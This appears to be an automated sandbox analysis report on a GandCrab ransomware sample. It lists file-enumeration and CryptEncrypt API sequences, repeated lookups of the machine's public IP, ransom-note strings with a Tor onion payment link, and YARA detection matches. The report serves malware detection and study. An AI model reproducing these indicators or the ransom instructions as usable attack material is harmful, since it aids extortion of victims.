                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeCode function: 0_2_0F146BA0 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,0_2_0F146BA0
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeCode function: 0_2_0F146DF0 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,0_2_0F146DF0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeCode function: 3_2_0F586DF0 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,3_2_0F586DF0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeCode function: 3_2_0F586BA0 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,3_2_0F586BA0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeCode function: 11_2_0F586DF0 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,11_2_0F586DF0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeCode function: 11_2_0F586BA0 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,11_2_0F586BA0

                Networking

                barindex
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeCode function: 0_2_0F146FF0 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com0_2_0F146FF0
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeCode function: 0_2_0F146FF0 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com0_2_0F146FF0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeCode function: 3_2_0F586FF0 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com3_2_0F586FF0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeCode function: 3_2_0F586FF0 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com3_2_0F586FF0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeCode function: 11_2_0F586FF0 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com11_2_0F586FF0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeCode function: 11_2_0F586FF0 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com11_2_0F586FF0
                Source: IJr8RvvhZ3.exe, 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/63b5ce1c617217a5
                Source: mqsmvj.exe, 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/63b5ce1c617217a5
                Source: mqsmvj.exe, 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/63b5ce1c617217a5
                Source: mqsmvj.exe, 0000000C.00000002.344084967.000000000F592000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/63b5ce1c617217a5
                Source: mqsmvj.exe, 0000000E.00000002.374552502.000000000F592000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/63b5ce1c617217a5
                Source: mqsmvj.exe, 00000010.00000002.406166723.000000000F592000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/63b5ce1c617217a5
                Source: mqsmvj.exe, 00000013.00000002.437026618.000000000F592000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/63b5ce1c617217a5
                Source: mqsmvj.exe, 00000017.00000002.473021592.000000000F592000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/63b5ce1c617217a5
                Source: mqsmvj.exe, 00000019.00000002.502628191.000000000F592000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/63b5ce1c617217a5
                Source: mqsmvj.exe, 0000001B.00000002.543807830.000000000F592000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/63b5ce1c617217a5
                Source: mqsmvj.exe, 0000001C.00000002.559901286.000000000F592000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/63b5ce1c617217a5
                Source: mqsmvj.exe, 0000001E.00000002.598229388.000000000F592000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/63b5ce1c617217a5
                Source: mqsmvj.exe, 00000023.00000002.638125851.000000000F592000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/63b5ce1c617217a5
                Source: mqsmvj.exe, 00000025.00000002.681251272.000000000F592000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/63b5ce1c617217a5
                Source: mqsmvj.exe, 00000027.00000002.720286366.000000000F592000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/63b5ce1c617217a5
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeDNS query: name: ipv4bot.whatismyipaddress.com
                Source: IJr8RvvhZ3.exe, 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmp, mqsmvj.exe, 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000000C.00000002.344084967.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000000E.00000002.374552502.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000010.00000002.406166723.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000013.00000002.437026618.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000017.00000002.473021592.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000019.00000002.502628191.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000001B.00000002.543807830.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000001C.00000002.559901286.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000001E.00000002.598229388.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000023.00000002.638125851.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000025.00000002.681251272.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000027.00000002.720286366.000000000F592000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: http://gdcbmuveqjsli57x.onion/63b5ce1c617217a5
                Source: mqsmvj.exe, 0000000B.00000002.327597151.000000000093A000.00000004.00000020.00020000.00000000.sdmp, mqsmvj.exe, 0000000C.00000002.343812574.0000000000873000.00000004.00000020.00020000.00000000.sdmp, mqsmvj.exe, 0000000C.00000003.343418273.0000000000873000.00000004.00000020.00020000.00000000.sdmp, mqsmvj.exe, 0000000C.00000002.343769957.0000000000838000.00000004.00000020.00020000.00000000.sdmp, mqsmvj.exe, 0000000E.00000002.373523162.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp, mqsmvj.exe, 00000019.00000002.501583638.0000000000D18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ipv4bot.whatismyipaddress.com/
                Source: mqsmvj.exe, 0000000C.00000002.343769957.0000000000838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ipv4bot.whatismyipaddress.com/$
                Source: mqsmvj.exe, 0000000C.00000002.343812574.0000000000873000.00000004.00000020.00020000.00000000.sdmp, mqsmvj.exe, 0000000C.00000003.343418273.0000000000873000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ipv4bot.whatismyipaddress.com/4
                Source: mqsmvj.exe, 00000019.00000002.501583638.0000000000D18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ipv4bot.whatismyipaddress.com/9I)
                Source: mqsmvj.exe, 0000000E.00000002.373523162.0000000000AD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ipv4bot.whatismyipaddress.com/CwX
                Source: mqsmvj.exe, 0000000B.00000002.327597151.000000000093A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ipv4bot.whatismyipaddress.com/I
                Source: mqsmvj.exe, 0000000C.00000002.343812574.0000000000873000.00000004.00000020.00020000.00000000.sdmp, mqsmvj.exe, 0000000C.00000003.343418273.0000000000873000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ipv4bot.whatismyipaddress.com/a
                Source: IJr8RvvhZ3.exe, 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmp, mqsmvj.exe, 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000000C.00000002.344084967.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000000E.00000002.374552502.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000010.00000002.406166723.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000013.00000002.437026618.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000017.00000002.473021592.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000019.00000002.502628191.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000001B.00000002.543807830.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000001C.00000002.559901286.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000001E.00000002.598229388.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000023.00000002.638125851.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000025.00000002.681251272.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000027.00000002.720286366.000000000F592000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: https://tox.chat/download.html
                Source: IJr8RvvhZ3.exe, 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmp, mqsmvj.exe, 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000000C.00000002.344084967.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000000E.00000002.374552502.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000010.00000002.406166723.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000013.00000002.437026618.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000017.00000002.473021592.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000019.00000002.502628191.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000001B.00000002.543807830.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000001C.00000002.559901286.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000001E.00000002.598229388.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000023.00000002.638125851.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000025.00000002.681251272.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000027.00000002.720286366.000000000F592000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.torproject.org/
                Source: unknownDNS traffic detected: queries for: ipv4bot.whatismyipaddress.com
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeCode function: 0_2_0F148050 lstrcatW,InternetCloseHandle,InternetConnectW,VirtualAlloc,wsprintfW,HttpOpenRequestW,HttpAddRequestHeadersW,HttpSendRequestW,InternetReadFile,InternetReadFile,GetLastError,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,VirtualFree,0_2_0F148050

                Spam, unwanted Advertisements and Ransom Demands

                barindex
                Source: Yara matchFile source: 25.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 35.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 37.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 27.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 30.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 39.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.IJr8RvvhZ3.exe.f140000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000002.344084967.000000000F592000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.406166723.000000000F592000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000002.598229388.000000000F592000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.473021592.000000000F592000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000002.638125851.000000000F592000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000027.00000002.720286366.000000000F592000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000002.543807830.000000000F592000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.559901286.000000000F592000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000019.00000002.502628191.000000000F592000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.437026618.000000000F592000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.374552502.000000000F592000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000002.681251272.000000000F592000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: IJr8RvvhZ3.exe PID: 732, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: mqsmvj.exe PID: 4652, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: mqsmvj.exe PID: 476, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: mqsmvj.exe PID: 5964, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: mqsmvj.exe PID: 5524, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: mqsmvj.exe PID: 5304, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: mqsmvj.exe PID: 4828, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: mqsmvj.exe PID: 244, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: mqsmvj.exe PID: 4940, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: mqsmvj.exe PID: 5160, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: mqsmvj.exe PID: 5636, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: mqsmvj.exe PID: 2564, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: mqsmvj.exe PID: 4480, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: mqsmvj.exe PID: 6000, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: mqsmvj.exe PID: 3780, type: MEMORYSTR
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeCode function: 0_2_0F146660 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,0_2_0F146660
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeCode function: 3_2_0F586660 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,3_2_0F586660
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeCode function: 11_2_0F586682 CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,11_2_0F586682

                System Summary

                barindex
                Source: IJr8RvvhZ3.exe, type: SAMPLEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: IJr8RvvhZ3.exe, type: SAMPLEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: IJr8RvvhZ3.exe, type: SAMPLEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 23.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                Source: 23.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab Payload Author: kevoreilly
                Source: 23.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
                Source: 28.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
